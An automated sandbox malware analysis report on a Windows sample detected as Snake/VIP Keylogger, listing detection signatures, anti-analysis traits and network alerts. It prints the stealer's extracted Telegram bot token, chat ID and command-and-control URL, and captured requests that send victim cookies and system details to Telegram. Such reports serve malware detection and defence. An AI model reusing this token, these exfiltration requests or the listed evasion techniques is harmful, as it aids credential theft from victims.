Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
x8M2g1Xxhz.exe

Overview

General Information

Sample name:x8M2g1Xxhz.exe
renamed because original name is a hash value
Original sample name:8d5ad043ae91a80f57574f52b78402a7497b7377a29ebd2401c1f42ef0c41617.exe
Analysis ID:1588991
MD5:6776d32ed5b26c788e25c1632b555d47
SHA1:ca579bfb0a3a85fd0c234385d1fc5873a19d11a4
SHA256:8d5ad043ae91a80f57574f52b78402a7497b7377a29ebd2401c1f42ef0c41617
Tags:exeRedLineStealeruser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • x8M2g1Xxhz.exe (PID: 7664 cmdline: "C:\Users\user\Desktop\x8M2g1Xxhz.exe" MD5: 6776D32ED5B26C788E25C1632B555D47)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot7365820770:AAFcSgCB-t8aplspIAYTFtpf48_ydah4lyE/sendMessage"}
{"Exfil Mode": "Telegram", "Bot Token": "7365820770:AAFcSgCB-t8aplspIAYTFtpf48_ydah4lyE", "Chat id": "5830304904"}
{"Exfil Mode": "Telegram", "Token": "7365820770:AAFcSgCB-t8aplspIAYTFtpf48_ydah4lyE", "Chat_id": "5830304904", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.3798081243.0000000004CA5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
    00000000.00000002.3798081243.0000000004C58000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
            Click to see the 24 entries
            SourceRuleDescriptionAuthorStrings
            0.2.x8M2g1Xxhz.exe.4850cbe.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.x8M2g1Xxhz.exe.4850cbe.1.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                0.2.x8M2g1Xxhz.exe.4850cbe.1.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  0.2.x8M2g1Xxhz.exe.7440000.5.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    0.2.x8M2g1Xxhz.exe.7440000.5.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                      Click to see the 74 entries
                      No Sigma rule has matched
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-11T08:08:33.448383+010028033053Unknown Traffic192.168.2.949759104.21.112.1443TCP
                      2025-01-11T08:08:36.861925+010028033053Unknown Traffic192.168.2.949784104.21.112.1443TCP
                      2025-01-11T08:08:37.928318+010028033053Unknown Traffic192.168.2.949792104.21.112.1443TCP
                      2025-01-11T08:08:38.983490+010028033053Unknown Traffic192.168.2.949802104.21.112.1443TCP
                      2025-01-11T08:08:40.057813+010028033053Unknown Traffic192.168.2.949809104.21.112.1443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-11T08:08:31.701907+010028032742Potentially Bad Traffic192.168.2.949747193.122.130.080TCP
                      2025-01-11T08:08:32.842548+010028032742Potentially Bad Traffic192.168.2.949747193.122.130.080TCP
                      2025-01-11T08:08:34.093331+010028032742Potentially Bad Traffic192.168.2.949761193.122.130.080TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-11T08:08:49.297232+010018100081Potentially Bad Traffic192.168.2.949874149.154.167.220443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-11T08:08:42.078227+010018100071Potentially Bad Traffic192.168.2.949824149.154.167.220443TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: x8M2g1Xxhz.exeAvira: detected
                      Source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7365820770:AAFcSgCB-t8aplspIAYTFtpf48_ydah4lyE", "Chat_id": "5830304904", "Version": "4.4"}
                      Source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7365820770:AAFcSgCB-t8aplspIAYTFtpf48_ydah4lyE", "Chat id": "5830304904"}
                      Source: x8M2g1Xxhz.exe.7664.0.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7365820770:AAFcSgCB-t8aplspIAYTFtpf48_ydah4lyE/sendMessage"}
                      Source: x8M2g1Xxhz.exeVirustotal: Detection: 59%Perma Link
                      Source: x8M2g1Xxhz.exeReversingLabs: Detection: 87%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: x8M2g1Xxhz.exeJoe Sandbox ML: detected

                      Location Tracking

                      barindex
                      Source: unknownDNS query: name: reallyfreegeoip.org
                      Source: x8M2g1Xxhz.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.9:49753 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49824 version: TLS 1.2
                      Source: Binary string: _.pdb source: x8M2g1Xxhz.exe, 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0471FB20h0_2_0471F962
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0471FB20h0_2_0471FB6F
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08300F50h0_2_08300D70
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 083018DAh0_2_08300D70
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 083031BEh0_2_08302DA0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0830D5F4h0_2_0830D348
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08302A74h0_2_083027C0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0830E2FCh0_2_0830E050
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0830E754h0_2_0830E4A8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 083031BEh0_2_083030EC
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0830EBACh0_2_0830E900
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0830F004h0_2_0830ED58
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0830F45Ch0_2_0830F1B0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 083031BEh0_2_08302D92
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0830F8B4h0_2_0830F608
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h0_2_08300273
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0830FD0Ch0_2_0830FA60
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0830D19Ch0_2_0830CEF0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0830DA4Ch0_2_0830D7A0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0830DEA4h0_2_0830DBF8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 085196EBh0_2_08519418
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08518320h0_2_08517FE0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08511CFCh0_2_08511A50
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0851BB21h0_2_0851B850
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0851E911h0_2_0851E640
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 085102ECh0_2_08510040
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0851DB49h0_2_0851D878
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0851370Ch0_2_08513460
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0851C8E9h0_2_0851C618
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 085132B4h0_2_08513008
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0851F6D9h0_2_0851F408
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 085162E4h0_2_08516038
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08515184h0_2_08514ED8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08517584h0_2_085172D8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0851EDA9h0_2_0851EAD8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08510B9Ch0_2_085108F0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08516B96h0_2_085168E8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0851BFB9h0_2_0851BCE8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0851673Ch0_2_08516490
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08510744h0_2_08510498
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0851712Ch0_2_08516E80
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08514D2Ch0_2_08514A80
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0851CD81h0_2_0851CAB0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08513B64h0_2_085138B8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0851FB71h0_2_0851F8A0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08512154h0_2_08511EA8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08512A04h0_2_08512758
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0851D219h0_2_0851CF48
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08510FF4h0_2_08510D48
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0851F241h0_2_0851EF70
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0851DFE1h0_2_0851DD10
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then mov esp, ebp0_2_0851B11A
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 085125ACh0_2_08512300
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 085179DCh0_2_08517730
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 085155DCh0_2_08515330
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 085118A4h0_2_085115F8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08515E8Ch0_2_08515BE0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0851D6B1h0_2_0851D3E0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0851C451h0_2_0851C180
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08517E34h0_2_08517B88
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08515A34h0_2_08515788
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08512E5Ch0_2_08512BB0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0851B689h0_2_0851B3B8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0851144Ch0_2_085111A0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0851E479h0_2_0851E1A8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 085863EAh0_2_08586078
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08586A1Bh0_2_08586720
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08581E7Ah0_2_08581BD0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0858F4C3h0_2_0858F1C8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08582C29h0_2_08582958
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08584321h0_2_08584050
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0858D34Bh0_2_0858D050
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08585A19h0_2_08585748
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0858A843h0_2_0858A548
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08580311h0_2_08580040
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08587D3Bh0_2_08587A40
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08587873h0_2_08587578
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08580C41h0_2_08580970
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0858E66Bh0_2_0858E370
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0858BB63h0_2_0858B868
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0858905Bh0_2_08588D60
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 085850E9h0_2_08584E18
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0858D813h0_2_0858D518
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0858AD0Bh0_2_0858AA10
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 085810D9h0_2_08580E08
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08588203h0_2_08587F08
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0858EFFBh0_2_0858ED00
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08581A09h0_2_08581738
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0858EB33h0_2_0858E838
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0858C02Bh0_2_0858BD30
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 085822F9h0_2_08582028
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08589523h0_2_08589228
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 085839F1h0_2_08583720
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 085807A9h0_2_085804D8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0858B1D3h0_2_0858AED8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 085886CBh0_2_085883D0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0858C9BBh0_2_0858C6C0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08582791h0_2_085824C0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0858C4F3h0_2_0858C1F8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 085830C1h0_2_08582DF0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 085899EBh0_2_085896F0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08586EE3h0_2_08586BE8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 085847B9h0_2_085844E8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0858DCDBh0_2_0858D9E0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08585EB1h0_2_08585BE0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08588B93h0_2_08588898
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0858F98Bh0_2_0858F690
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08583559h0_2_08583288
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0858CE83h0_2_0858CB88
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08584C52h0_2_08584980
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0858A37Bh0_2_0858A080
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08583E89h0_2_08583BB8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08589EB3h0_2_08589BB8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08585581h0_2_085852B0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 085873ABh0_2_085870B0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0858E1A3h0_2_0858DEA8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 08581571h0_2_085812A0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 0858B69Bh0_2_0858B3A0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 085B24BBh0_2_085B21C0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 085B033Bh0_2_085B0040
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 085B1B2Bh0_2_085B1830
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 085B1FF3h0_2_085B1CF8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 085B119Bh0_2_085B0EA0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 085B1663h0_2_085B1368
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 085B0803h0_2_085B0508
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then jmp 085B0CCCh0_2_085B09D0
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_085F50F8
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_085F69C9
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_085F6F48
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_085F6F74
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_085F6268
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_085F6266
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_085F663E
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_085F1C90
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_085F1C8A
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_085F1FA9
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_085F50E9
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_085F7206

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49874 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.9:49824 -> 149.154.167.220:443
                      Source: unknownDNS query: name: api.telegram.org
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.49f0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.x8M2g1Xxhz.exe.91dab0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.7440000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20and%20Time:%2011/01/2025%20/%2012:14:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20704672%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7365820770:AAFcSgCB-t8aplspIAYTFtpf48_ydah4lyE/sendDocument?chat_id=5830304904&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd329d9dfe367aHost: api.telegram.orgContent-Length: 1277
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
                      Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
                      Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
                      Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: checkip.dyndns.org
                      Source: unknownDNS query: name: reallyfreegeoip.org
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49747 -> 193.122.130.0:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49761 -> 193.122.130.0:80
